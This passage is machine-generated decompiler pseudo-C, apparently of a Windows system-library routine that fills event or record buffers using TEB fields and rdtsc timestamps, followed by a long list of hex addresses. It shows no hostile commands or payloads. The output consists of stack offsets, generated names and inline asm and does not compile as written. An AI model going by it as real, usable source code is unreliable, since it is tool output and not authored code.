                                                                                                                						_t421 = E044D4C56(0, __edx, __ecx, __eflags);
                                                                                                                						__eflags = _t421;
                                                                                                                						if(_t421 != 0) {
                                                                                                                							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                                                                                							E0444D000(0x410);
                                                                                                                							 *(_t528 - 0x18) = _t529;
                                                                                                                							 *(_t528 - 0x9c) = _t529;
                                                                                                                							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                                                                                							E044D5542(_t528 - 0x9c, _t528 - 0x84);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					_t435 = _t427;
                                                                                                                					 *(_t528 - 0xd0) = _t435;
                                                                                                                					_t474 = _t511 + 0x65;
                                                                                                                					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                                                					_t511 = 0x18;
                                                                                                                					while(1) {
                                                                                                                						 *(_t528 - 0xa0) = _t427;
                                                                                                                						 *(_t528 - 0xbc) = _t427;
                                                                                                                						 *(_t528 - 0x80) = _t427;
                                                                                                                						 *(_t528 - 0x78) = 0x50;
                                                                                                                						 *(_t528 - 0x79) = _t427;
                                                                                                                						 *(_t528 - 0x7a) = _t427;
                                                                                                                						 *(_t528 - 0x8c) = _t427;
                                                                                                                						 *(_t528 - 0x98) = _t427;
                                                                                                                						 *(_t528 - 0x90) = _t427;
                                                                                                                						 *(_t528 - 0xb0) = _t427;
                                                                                                                						 *(_t528 - 0xb8) = _t427;
                                                                                                                						_t296 = 1 << _t435;
                                                                                                                						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                                                                                						__eflags = _t436 & _t296;
                                                                                                                						if((_t436 & _t296) != 0) {
                                                                                                                							goto L92;
                                                                                                                						}
                                                                                                                						__eflags =  *((char*)(_t474 - 1));
                                                                                                                						if( *((char*)(_t474 - 1)) == 0) {
                                                                                                                							goto L92;
                                                                                                                						}
                                                                                                                						_t301 =  *_t474;
                                                                                                                						__eflags = _t494[1] - _t301;
                                                                                                                						if(_t494[1] <= _t301) {
                                                                                                                							L10:
                                                                                                                							__eflags =  *(_t474 - 5) & 0x00000040;
                                                                                                                							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                                                                                								L12:
                                                                                                                								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                                                                                								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                                                                                									goto L92;
                                                                                                                								}
                                                                                                                								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                                                                                								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                                                                                								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                                                                                									goto L92;
                                                                                                                								}
                                                                                                                								__eflags = _t442 -  *(_t474 - 0x11);
                                                                                                                								if(_t442 !=  *(_t474 - 0x11)) {
                                                                                                                									goto L92;
                                                                                                                								}
                                                                                                                								L15:
                                                                                                                								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                                                                                								 *(_t528 - 0xc0) = _t306;
                                                                                                                								 *(_t528 - 0xa4) = _t306;
                                                                                                                								__eflags =  *0x44f60e8;
                                                                                                                								if( *0x44f60e8 != 0) {
                                                                                                                									__eflags = _t306 - 0x40;
                                                                                                                									if(_t306 < 0x40) {
                                                                                                                										L20:
                                                                                                                										asm("lock inc dword [eax]");
                                                                                                                										_t310 =  *0x44f60e8; // 0x0
                                                                                                                										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                                                                                										__eflags = _t311 & 0x00000001;
                                                                                                                										if((_t311 & 0x00000001) == 0) {
                                                                                                                											 *(_t528 - 0xa0) = _t311;
                                                                                                                											_t475 = _t427;
                                                                                                                											 *(_t528 - 0x74) = _t427;
                                                                                                                											__eflags = _t475;
                                                                                                                											if(_t475 != 0) {
                                                                                                                												L91:
                                                                                                                												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                												goto L92;
                                                                                                                											}
                                                                                                                											asm("sbb edi, edi");
                                                                                                                											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                                                                                											_t511 = _t498;
                                                                                                                											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                											__eflags =  *(_t312 - 5) & 1;
                                                                                                                											if(( *(_t312 - 5) & 1) != 0) {
                                                                                                                												_push(_t528 - 0x98);
                                                                                                                												_push(0x4c);
                                                                                                                												_push(_t528 - 0x70);
                                                                                                                												_push(1);
                                                                                                                												_push(0xfffffffa);
                                                                                                                												_t412 = E04449710();
                                                                                                                												_t475 = _t427;
                                                                                                                												__eflags = _t412;
                                                                                                                												if(_t412 >= 0) {
                                                                                                                													_t414 =  *(_t528 - 0x98) - 8;
                                                                                                                													 *(_t528 - 0x98) = _t414;
                                                                                                                													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                                                                                													 *(_t528 - 0x8c) = _t416;
                                                                                                                													 *(_t528 - 0x79) = 1;
                                                                                                                													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                                                                                													__eflags = _t511;
                                                                                                                												}
                                                                                                                											}
                                                                                                                											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                                                                                											__eflags = _t446 & 0x00000004;
                                                                                                                											if((_t446 & 0x00000004) != 0) {
                                                                                                                												__eflags =  *(_t528 - 0x9c);
                                                                                                                												if( *(_t528 - 0x9c) != 0) {
                                                                                                                													 *(_t528 - 0x7a) = 1;
                                                                                                                													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                                                                                													__eflags = _t511;
                                                                                                                												}
                                                                                                                											}
                                                                                                                											_t313 = 2;
                                                                                                                											_t447 = _t446 & _t313;
                                                                                                                											__eflags = _t447;
                                                                                                                											 *(_t528 - 0xd4) = _t447;
                                                                                                                											if(_t447 != 0) {
                                                                                                                												_t406 = 0x10;
                                                                                                                												_t511 = _t511 + _t406;
                                                                                                                												__eflags = _t511;
                                                                                                                											}
                                                                                                                											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                                                                                											 *(_t528 - 0x88) = _t427;
                                                                                                                											__eflags =  *(_t528 + 0x1c);
                                                                                                                											if( *(_t528 + 0x1c) <= 0) {
                                                                                                                												L45:
                                                                                                                												__eflags =  *(_t528 - 0xb0);
                                                                                                                												if( *(_t528 - 0xb0) != 0) {
                                                                                                                													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                                                													__eflags = _t511;
                                                                                                                												}
                                                                                                                												__eflags = _t475;
                                                                                                                												if(_t475 != 0) {
                                                                                                                													asm("lock dec dword [ecx+edx*8+0x4]");
                                                                                                                													goto L100;
                                                                                                                												} else {
                                                                                                                													_t494[3] = _t511;
                                                                                                                													_t451 =  *(_t528 - 0xa0);
                                                                                                                													_t427 = E04446DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                                                                                                													 *(_t528 - 0x88) = _t427;
                                                                                                                													__eflags = _t427;
                                                                                                                													if(_t427 == 0) {
                                                                                                                														__eflags = _t511 - 0xfff8;
                                                                                                                														if(_t511 <= 0xfff8) {
                                                                                                                															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                                                                                                															asm("sbb ecx, ecx");
                                                                                                                															__eflags = (_t451 & 0x000000e2) + 8;
                                                                                                                														}
                                                                                                                														asm("lock dec dword [eax+edx*8+0x4]");
                                                                                                                														L100:
                                                                                                                														goto L101;
                                                                                                                													}
                                                                                                                													_t453 =  *(_t528 - 0xa0);
                                                                                                                													 *_t494 = _t453;
                                                                                                                													_t494[1] = _t427;
                                                                                                                													_t494[2] =  *(_t528 - 0xbc);
                                                                                                                													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                                                                                                													 *_t427 =  *(_t453 + 0x24) | _t511;
                                                                                                                													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                                                                                                													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                                                                                                													asm("movsd");
                                                                                                                													asm("movsd");
                                                                                                                													asm("movsd");
                                                                                                                													asm("movsd");
                                                                                                                													asm("movsd");
                                                                                                                													asm("movsd");
                                                                                                                													asm("movsd");
                                                                                                                													asm("movsd");
                                                                                                                													__eflags =  *(_t528 + 0x14);
                                                                                                                													if( *(_t528 + 0x14) == 0) {
                                                                                                                														__eflags =  *[fs:0x18] + 0xf50;
                                                                                                                													}
                                                                                                                													asm("movsd");
                                                                                                                													asm("movsd");
                                                                                                                													asm("movsd");
                                                                                                                													asm("movsd");
                                                                                                                													__eflags =  *(_t528 + 0x18);
                                                                                                                													if( *(_t528 + 0x18) == 0) {
                                                                                                                														_t454 =  *(_t528 - 0x80);
                                                                                                                														_t479 =  *(_t528 - 0x78);
                                                                                                                														_t327 = 1;
                                                                                                                														__eflags = 1;
                                                                                                                													} else {
                                                                                                                														_t146 = _t427 + 0x50; // 0x50
                                                                                                                														_t454 = _t146;
                                                                                                                														 *(_t528 - 0x80) = _t454;
                                                                                                                														_t382 = 0x18;
                                                                                                                														 *_t454 = _t382;
                                                                                                                														 *((short*)(_t454 + 2)) = 1;
                                                                                                                														_t385 = 0x10;
                                                                                                                														 *((short*)(_t454 + 6)) = _t385;
                                                                                                                														 *(_t454 + 4) = 0;
                                                                                                                														asm("movsd");
                                                                                                                														asm("movsd");
                                                                                                                														asm("movsd");
                                                                                                                														asm("movsd");
                                                                                                                														_t327 = 1;
                                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                														_t479 = 0x68;
                                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                                													}
                                                                                                                													__eflags =  *(_t528 - 0x79) - _t327;
                                                                                                                													if( *(_t528 - 0x79) == _t327) {
                                                                                                                														_t524 = _t479 + _t427;
                                                                                                                														_t508 =  *(_t528 - 0x8c);
                                                                                                                														 *_t524 = _t508;
                                                                                                                														_t373 = 2;
                                                                                                                														 *((short*)(_t524 + 2)) = _t373;
                                                                                                                														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                                                                                                														 *((short*)(_t524 + 4)) = 0;
                                                                                                                														_t167 = _t524 + 8; // 0x8
                                                                                                                														E0444F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                                                                                                														_t529 = _t529 + 0xc;
                                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                                														_t380 =  *(_t528 - 0x80);
                                                                                                                														__eflags = _t380;
                                                                                                                														if(_t380 != 0) {
                                                                                                                															_t173 = _t380 + 4;
                                                                                                                															 *_t173 =  *(_t380 + 4) | 1;
                                                                                                                															__eflags =  *_t173;
                                                                                                                														}
                                                                                                                														_t454 = _t524;
                                                                                                                														 *(_t528 - 0x80) = _t454;
                                                                                                                														_t327 = 1;
                                                                                                                														__eflags = 1;
                                                                                                                													}
                                                                                                                													__eflags =  *(_t528 - 0xd4);
                                                                                                                													if( *(_t528 - 0xd4) == 0) {
                                                                                                                														_t505 =  *(_t528 - 0x80);
                                                                                                                													} else {
                                                                                                                														_t505 = _t479 + _t427;
                                                                                                                														_t523 = 0x10;
                                                                                                                														 *_t505 = _t523;
                                                                                                                														_t367 = 3;
                                                                                                                														 *((short*)(_t505 + 2)) = _t367;
                                                                                                                														_t368 = 4;
                                                                                                                														 *((short*)(_t505 + 6)) = _t368;
                                                                                                                														 *(_t505 + 4) = 0;
                                                                                                                														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                                                                                                														_t327 = 1;
                                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                														_t479 = _t479 + _t523;
                                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                                														__eflags = _t454;
                                                                                                                														if(_t454 != 0) {
                                                                                                                															_t186 = _t454 + 4;
                                                                                                                															 *_t186 =  *(_t454 + 4) | 1;
                                                                                                                															__eflags =  *_t186;
                                                                                                                														}
                                                                                                                														 *(_t528 - 0x80) = _t505;
                                                                                                                													}
                                                                                                                													__eflags =  *(_t528 - 0x7a) - _t327;
                                                                                                                													if( *(_t528 - 0x7a) == _t327) {
                                                                                                                														 *(_t528 - 0xd4) = _t479 + _t427;
                                                                                                                														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                                                                                                														E0444F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                                                                                                														_t529 = _t529 + 0xc;
                                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                														_t479 =  *(_t528 - 0x78) + _t522;
                                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                                														__eflags = _t505;
                                                                                                                														if(_t505 != 0) {
                                                                                                                															_t199 = _t505 + 4;
                                                                                                                															 *_t199 =  *(_t505 + 4) | 1;
                                                                                                                															__eflags =  *_t199;
                                                                                                                														}
                                                                                                                														_t505 =  *(_t528 - 0xd4);
                                                                                                                														 *(_t528 - 0x80) = _t505;
                                                                                                                													}
                                                                                                                													__eflags =  *(_t528 - 0xa8);
                                                                                                                													if( *(_t528 - 0xa8) != 0) {
                                                                                                                														_t356 = _t479 + _t427;
                                                                                                                														 *(_t528 - 0xd4) = _t356;
                                                                                                                														_t462 =  *(_t528 - 0xac);
                                                                                                                														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                                                                                                														_t485 = 0xc;
                                                                                                                														 *((short*)(_t356 + 2)) = _t485;
                                                                                                                														 *(_t356 + 6) = _t462;
                                                                                                                														 *((short*)(_t356 + 4)) = 0;
                                                                                                                														_t211 = _t356 + 8; // 0x9
                                                                                                                														E0444F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                                                                                                														E0444FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                                                                                                														_t529 = _t529 + 0x18;
                                                                                                                														_t427 =  *(_t528 - 0x88);
                                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                														_t505 =  *(_t528 - 0xd4);
                                                                                                                														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                                														_t362 =  *(_t528 - 0x80);
                                                                                                                														__eflags = _t362;
                                                                                                                														if(_t362 != 0) {
                                                                                                                															_t222 = _t362 + 4;
                                                                                                                															 *_t222 =  *(_t362 + 4) | 1;
                                                                                                                															__eflags =  *_t222;
                                                                                                                														}
                                                                                                                													}
                                                                                                                													__eflags =  *(_t528 - 0xb0);
                                                                                                                													if( *(_t528 - 0xb0) != 0) {
                                                                                                                														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                                                                                                														_t458 = 0xb;
                                                                                                                														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                                                                                                														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                                                                                                														 *((short*)(_t427 + 4 + _t479)) = 0;
                                                                                                                														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                                                                                                														E0444FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                                                                                                														_t529 = _t529 + 0xc;
                                                                                                                														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                                                                                                														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                                                                                                														 *(_t528 - 0x78) = _t479;
                                                                                                                														__eflags = _t505;
                                                                                                                														if(_t505 != 0) {
                                                                                                                															_t241 = _t505 + 4;
                                                                                                                															 *_t241 =  *(_t505 + 4) | 1;
                                                                                                                															__eflags =  *_t241;
                                                                                                                														}
                                                                                                                													}
                                                                                                                													_t328 =  *(_t528 + 0x1c);
                                                                                                                													__eflags = _t328;
                                                                                                                													if(_t328 == 0) {
                                                                                                                														L87:
                                                                                                                														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                                                                                                														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                                                                                                														_t455 =  *(_t528 - 0xdc);
                                                                                                                														 *(_t427 + 0x14) = _t455;
                                                                                                                														_t480 =  *(_t528 - 0xa0);
                                                                                                                														_t517 = 3;
                                                                                                                														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                                                                                                														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                                                                                                															asm("rdtsc");
                                                                                                                															 *(_t427 + 0x3c) = _t480;
                                                                                                                														} else {
                                                                                                                															 *(_t427 + 0x3c) = _t455;
                                                                                                                														}
                                                                                                                														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                                                                                                														_t456 =  *[fs:0x18];
                                                                                                                														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                                                                                                														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                                                                                                														_t427 = 0;
                                                                                                                														__eflags = 0;
                                                                                                                														_t511 = 0x18;
                                                                                                                														goto L91;
                                                                                                                													} else {
                                                                                                                														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                                                                                                														__eflags = _t519;
                                                                                                                														 *(_t528 - 0x8c) = _t328;
                                                                                                                														do {
                                                                                                                															_t506 =  *((intOrPtr*)(_t519 - 4));
                                                                                                                															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                                                                                                															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                                                                                                															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                                                                                                															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                                                                                                															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                                                                                                																_t334 =  *_t519;
                                                                                                                															} else {
                                                                                                                																_t334 = 0;
                                                                                                                															}
                                                                                                                															_t336 = _t334 & 0x000000ff;
                                                                                                                															__eflags = _t336;
                                                                                                                															_t427 =  *(_t528 - 0x88);
                                                                                                                															if(_t336 == 0) {
                                                                                                                																_t481 = _t479 + _t506;
                                                                                                                																__eflags = _t481;
                                                                                                                																 *(_t528 - 0x78) = _t481;
                                                                                                                																E0444F3E0(_t479 + _t427, _t457, _t506);
                                                                                                                																_t529 = _t529 + 0xc;
                                                                                                                															} else {
                                                                                                                																_t340 = _t336 - 1;
                                                                                                                																__eflags = _t340;
                                                                                                                																if(_t340 == 0) {
                                                                                                                																	E0444F3E0( *(_t528 - 0xb8), _t457, _t506);
                                                                                                                																	_t529 = _t529 + 0xc;
                                                                                                                																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                                                                                                                																} else {
                                                                                                                																	__eflags = _t340 == 0;
                                                                                                                																	if(_t340 == 0) {
                                                                                                                																		__eflags = _t506 - 8;
                                                                                                                																		if(_t506 == 8) {
                                                                                                                																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                                                                                                                																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                                                                                                                																		}
                                                                                                                																	}
                                                                                                                																}
                                                                                                                															}
                                                                                                                															_t339 = 0x10;
                                                                                                                															_t519 = _t519 + _t339;
                                                                                                                															_t263 = _t528 - 0x8c;
                                                                                                                															 *_t263 =  *(_t528 - 0x8c) - 1;
                                                                                                                															__eflags =  *_t263;
                                                                                                                															_t479 =  *(_t528 - 0x78);
                                                                                                                														} while ( *_t263 != 0);
                                                                                                                														goto L87;
                                                                                                                													}
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                                                                                                                												 *(_t528 - 0xa2) = _t392;
                                                                                                                												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                                                                                                                												__eflags = _t469;
                                                                                                                												while(1) {
                                                                                                                													 *(_t528 - 0xe4) = _t511;
                                                                                                                													__eflags = _t392;
                                                                                                                													_t393 = _t427;
                                                                                                                													if(_t392 != 0) {
                                                                                                                														_t393 =  *((intOrPtr*)(_t469 + 4));
                                                                                                                													}
                                                                                                                													_t395 = (_t393 & 0x000000ff) - _t427;
                                                                                                                													__eflags = _t395;
                                                                                                                													if(_t395 == 0) {
                                                                                                                														_t511 = _t511 +  *_t469;
                                                                                                                														__eflags = _t511;
                                                                                                                													} else {
                                                                                                                														_t398 = _t395 - 1;
                                                                                                                														__eflags = _t398;
                                                                                                                														if(_t398 == 0) {
                                                                                                                															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                                                                                                                															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                                                                                                                														} else {
                                                                                                                															__eflags = _t398 == 1;
                                                                                                                															if(_t398 == 1) {
                                                                                                                																 *(_t528 - 0xa8) =  *(_t469 - 8);
                                                                                                                																_t402 =  *_t469 & 0x0000ffff;
                                                                                                                																 *(_t528 - 0xac) = _t402;
                                                                                                                																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                                                                                                															}
                                                                                                                														}
                                                                                                                													}
                                                                                                                													__eflags = _t511 -  *(_t528 - 0xe4);
                                                                                                                													if(_t511 <  *(_t528 - 0xe4)) {
                                                                                                                														break;
                                                                                                                													}
                                                                                                                													_t397 =  *(_t528 - 0x88) + 1;
                                                                                                                													 *(_t528 - 0x88) = _t397;
                                                                                                                													_t469 = _t469 + 0x10;
                                                                                                                													__eflags = _t397 -  *(_t528 + 0x1c);
                                                                                                                													_t392 =  *(_t528 - 0xa2);
                                                                                                                													if(_t397 <  *(_t528 + 0x1c)) {
                                                                                                                														continue;
                                                                                                                													}
                                                                                                                													goto L45;
                                                                                                                												}
                                                                                                                												_t475 = 0x216;
                                                                                                                												 *(_t528 - 0x74) = 0x216;
                                                                                                                												goto L45;
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											asm("lock dec dword [eax+ecx*8+0x4]");
                                                                                                                											goto L16;
                                                                                                                										}
                                                                                                                									}
                                                                                                                									_t491 = E044D4CAB(_t306, _t528 - 0xa4);
                                                                                                                									 *(_t528 - 0x74) = _t491;
                                                                                                                									__eflags = _t491;
                                                                                                                									if(_t491 != 0) {
                                                                                                                										goto L91;
                                                                                                                									} else {
                                                                                                                										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                                                                                										goto L20;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								L16:
                                                                                                                								 *(_t528 - 0x74) = 0x1069;
                                                                                                                								L93:
                                                                                                                								_t298 =  *(_t528 - 0xd0) + 1;
                                                                                                                								 *(_t528 - 0xd0) = _t298;
                                                                                                                								_t474 = _t474 + _t511;
                                                                                                                								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                                                                                								_t494 = 4;
                                                                                                                								__eflags = _t298 - _t494;
                                                                                                                								if(_t298 >= _t494) {
                                                                                                                									goto L100;
                                                                                                                								}
                                                                                                                								_t494 =  *(_t528 - 0xcc);
                                                                                                                								_t435 = _t298;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							__eflags = _t494[2] | _t494[3];
                                                                                                                							if((_t494[2] | _t494[3]) == 0) {
                                                                                                                								goto L15;
                                                                                                                							}
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						__eflags = _t301;
                                                                                                                						if(_t301 != 0) {
                                                                                                                							goto L92;
                                                                                                                						}
                                                                                                                						goto L10;
                                                                                                                						L92:
                                                                                                                						goto L93;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_push(0x57);
                                                                                                                					L101:
                                                                                                                					return E0445D130(_t427, _t494, _t511);
                                                                                                                				}
                                                                                                                			}










































































                                                                                                                0x044d6012
                                                                                                                0x044d6018
                                                                                                                0x044d6019
                                                                                                                0x044d601a
                                                                                                                0x044d601b
                                                                                                                0x044d601c
                                                                                                                0x044d6020
                                                                                                                0x044d6059
                                                                                                                0x044d605c
                                                                                                                0x044d6061
                                                                                                                0x044d6061
                                                                                                                0x044d6022
                                                                                                                0x044d6022
                                                                                                                0x044d6022
                                                                                                                0x044d6025
                                                                                                                0x044d602a
                                                                                                                0x044d602b
                                                                                                                0x044d6031
                                                                                                                0x044d6037
                                                                                                                0x044d6038
                                                                                                                0x044d603e
                                                                                                                0x044d6048
                                                                                                                0x044d6049
                                                                                                                0x044d604a
                                                                                                                0x044d604b
                                                                                                                0x044d604c
                                                                                                                0x044d604d
                                                                                                                0x044d6053
                                                                                                                0x044d6054
                                                                                                                0x044d6054
                                                                                                                0x044d6062
                                                                                                                0x044d6065
                                                                                                                0x044d6067
                                                                                                                0x044d606a
                                                                                                                0x044d6070
                                                                                                                0x044d6075
                                                                                                                0x044d6076
                                                                                                                0x044d6081
                                                                                                                0x044d6087
                                                                                                                0x044d6095
                                                                                                                0x044d6099
                                                                                                                0x044d609e
                                                                                                                0x044d60a4
                                                                                                                0x044d60ae
                                                                                                                0x044d60b0
                                                                                                                0x044d60b3
                                                                                                                0x044d60b6
                                                                                                                0x044d60b8
                                                                                                                0x044d60ba
                                                                                                                0x044d60ba
                                                                                                                0x044d60ba
                                                                                                                0x044d60ba
                                                                                                                0x044d60be
                                                                                                                0x044d60c0
                                                                                                                0x044d60c5
                                                                                                                0x044d60c5
                                                                                                                0x044d60c5
                                                                                                                0x044d60c6
                                                                                                                0x044d60cd
                                                                                                                0x044d6114
                                                                                                                0x044d60cf
                                                                                                                0x044d60cf
                                                                                                                0x044d60d4
                                                                                                                0x044d60d5
                                                                                                                0x044d60da
                                                                                                                0x044d60db
                                                                                                                0x044d60e1
                                                                                                                0x044d60e2
                                                                                                                0x044d60e8
                                                                                                                0x044d60f8
                                                                                                                0x044d60fd
                                                                                                                0x044d60fe
                                                                                                                0x044d6102
                                                                                                                0x044d6104
                                                                                                                0x044d6107
                                                                                                                0x044d6109
                                                                                                                0x044d610b
                                                                                                                0x044d610b
                                                                                                                0x044d610b
                                                                                                                0x044d610b
                                                                                                                0x044d610f
                                                                                                                0x044d610f
                                                                                                                0x044d6117
                                                                                                                0x044d611a
                                                                                                                0x044d611f
                                                                                                                0x044d6125
                                                                                                                0x044d6134
                                                                                                                0x044d6139
                                                                                                                0x044d613f
                                                                                                                0x044d6146
                                                                                                                0x044d6148
                                                                                                                0x044d614b
                                                                                                                0x044d614d
                                                                                                                0x044d614f
                                                                                                                0x044d614f
                                                                                                                0x044d614f
                                                                                                                0x044d614f
                                                                                                                0x044d6153
                                                                                                                0x044d6159
                                                                                                                0x044d6159
                                                                                                                0x044d615c
                                                                                                                0x044d6163
                                                                                                                0x044d6169
                                                                                                                0x044d616c
                                                                                                                0x044d6172
                                                                                                                0x044d6181
                                                                                                                0x044d6186
                                                                                                                0x044d6187
                                                                                                                0x044d618b
                                                                                                                0x044d6191
                                                                                                                0x044d6195
                                                                                                                0x044d61a3
                                                                                                                0x044d61bb
                                                                                                                0x044d61c0
                                                                                                                0x044d61c3
                                                                                                                0x044d61cc
                                                                                                                0x044d61d0
                                                                                                                0x044d61dc
                                                                                                                0x044d61de
                                                                                                                0x044d61e1
                                                                                                                0x044d61e4
                                                                                                                0x044d61e6
                                                                                                                0x044d61e8
                                                                                                                0x044d61e8
                                                                                                                0x044d61e8
                                                                                                                0x044d61e8
                                                                                                                0x044d61e6
                                                                                                                0x044d61ec
                                                                                                                0x044d61f3
                                                                                                                0x044d6203
                                                                                                                0x044d6209
                                                                                                                0x044d620a
                                                                                                                0x044d6216
                                                                                                                0x044d621d
                                                                                                                0x044d6227
                                                                                                                0x044d6241
                                                                                                                0x044d6246
                                                                                                                0x044d624c
                                                                                                                0x044d6257
                                                                                                                0x044d6259
                                                                                                                0x044d625c
                                                                                                                0x044d625e
                                                                                                                0x044d6260
                                                                                                                0x044d6260
                                                                                                                0x044d6260
                                                                                                                0x044d6260
                                                                                                                0x044d625e
                                                                                                                0x044d6264
                                                                                                                0x044d6267
                                                                                                                0x044d6269
                                                                                                                0x044d6315
                                                                                                                0x044d6315
                                                                                                                0x044d631b
                                                                                                                0x044d631e
                                                                                                                0x044d6324
                                                                                                                0x044d6327
                                                                                                                0x044d632f
                                                                                                                0x044d6330
                                                                                                                0x044d6333
                                                                                                                0x044d633a
                                                                                                                0x044d633c
                                                                                                                0x044d6335
                                                                                                                0x044d6335
                                                                                                                0x044d6335
                                                                                                                0x044d633f
                                                                                                                0x044d6342
                                                                                                                0x044d634c
                                                                                                                0x044d6352
                                                                                                                0x044d6355
                                                                                                                0x044d6355
                                                                                                                0x044d6359
                                                                                                                0x00000000
                                                                                                                0x044d626f
                                                                                                                0x044d6275
                                                                                                                0x044d6275
                                                                                                                0x044d6278
                                                                                                                0x044d627e
                                                                                                                0x044d627e
                                                                                                                0x044d6281
                                                                                                                0x044d6287
                                                                                                                0x044d628d
                                                                                                                0x044d6298
                                                                                                                0x044d629c
                                                                                                                0x044d62a2
                                                                                                                0x044d629e
                                                                                                                0x044d629e
                                                                                                                0x044d629e
                                                                                                                0x044d62a7
                                                                                                                0x044d62a7
                                                                                                                0x044d62aa
                                                                                                                0x044d62b0
                                                                                                                0x044d62f0
                                                                                                                0x044d62f0
                                                                                                                0x044d62f2
                                                                                                                0x044d62f8
                                                                                                                0x044d62fd
                                                                                                                0x044d62b2
